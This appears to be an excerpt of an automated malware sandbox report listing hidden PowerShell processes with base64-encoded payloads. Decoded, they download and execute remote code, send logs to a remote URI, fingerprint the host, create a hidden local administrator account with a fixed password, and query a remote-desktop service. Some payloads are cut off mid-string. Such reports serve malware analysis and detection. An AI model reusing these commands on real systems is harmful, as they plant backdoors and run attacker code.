Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARQA0AEEAZABBAEIARgBBAEUANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAVAAuAEUATgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAHQAUwBUAHIASQBOAEcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBhAFoAQQA9AD0AIgApACkAKQApAC4AQwBPAE4AdABFAE4AdAApACkA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA4AGEAOAA0AGMAMwA2ADAAOQAzADIAMwBkAGUANgBjAGQAOQBjADIANQBhADEAOAA1ADEAZAAwAGQAYwBkADgAYQAyAGYAMwBiADAAOQA3ADcANgBiAGYAOABlADcAZAA0AGQANgA0ADAAMgBhADYANwAyADAAYwAxAGEAZABkADgAOQBhADIAMwBkADUAZQBkADEAMgBlADAANQBjAGYAMgBmADUAMwBkADcAYgAwADEANQBlADcANgBiAGQANQBiADgAMgAyADMAOQA5ADgANwBjADAANAA5AGQAZQBmAGIAOQBiAGUANwA3ADcANQBmADAAYgA1ADAAZQAxADMAMABkADgAZABiAGUAZABlADQANQA4ADgAYQAwADYAZQAwAGIAYgAwADUANgA4AGIAYwA5AGQAYwA1AGEAOQA1ADkAMAA1ADgAZAAxAGIAOQA4ADcAMwAyAGIAYgA4AGQAYQA0AGMAMAA3AGQAYgBiADUANgA3AGYAOQAzAGYAMwA3ADAANgBkAGQANgAyAGYAZAAyADEAZgA1AGUAYQBlADEANwAyAGQANQAwADIANgBjAGQAZAA1ADIANwA5AGYAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpACAAPQAgADAAOwAgAC
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powERSheLl.EXE -WInDOwStYle HiDdEN -encOdeDcOmmAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBWAEEAQQB1AEEARQBVAEEAVABnAEIARABBAEUAOABBAFoAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBGAEEASABRAEEAVQB3AEIAVQBBAEgASQBBAFMAUQBCAE8AQQBFAGMAQQBLAEEAQQBvAEEARQBrAEEAVgB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAGgAQQBGAG8AQQBRAFEAQQA5AEEARAAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARQA0AEEAZABBAEIARgBBAEUANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAVAAuAEUATgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAHQAUwBUAHIASQBOAEcAKAAoAEkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBhAFoAQQA9AD0AIgApACkAKQApAC4AQwBPAE4AdABFAE4AdAApACkA	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA4AGEAOAA0AGMAMwA2ADAAOQAzADIAMwBkAGUANgBjAGQAOQBjADIANQBhADEAOAA1ADEAZAAwAGQAYwBkADgAYQAyAGYAMwBiADAAOQA3ADcANgBiAGYAOABlADcAZAA0AGQANgA0ADAAMgBhADYANwAyADAAYwAxAGEAZABkADgAOQBhADIAMwBkADUAZQBkADEAMgBlADAANQBjAGYAMgBmADUAMwBkADcAYgAwADEANQBlADcANgBiAGQANQBiADgAMgAyADMAOQA5ADgANwBjADAANAA5AGQAZQBmAGIAOQBiAGUANwA3ADcANQBmADAAYgA1ADAAZQAxADMAMABkADgAZABiAGUAZABlADQANQA4ADgAYQAwADYAZQAwAGIAYgAwADUANgA4AGIAYwA5AGQAYwA1AGEAOQA1ADkAMAA1ADgAZAAxAGIAOQA4ADcAMwAyAGIAYgA4AGQAYQA0AGMAMAA3AGQAYgBiADUANgA3AGYAOQAzAGYAMwA3ADAANgBkAGQANgAyAGYAZAAyADEAZgA1AGUAYQBlADEANwAyAGQANQAwADIANgBjAGQAZAA1ADIANwA5AGYAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpACAAPQAgADAAOwAgAC
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBk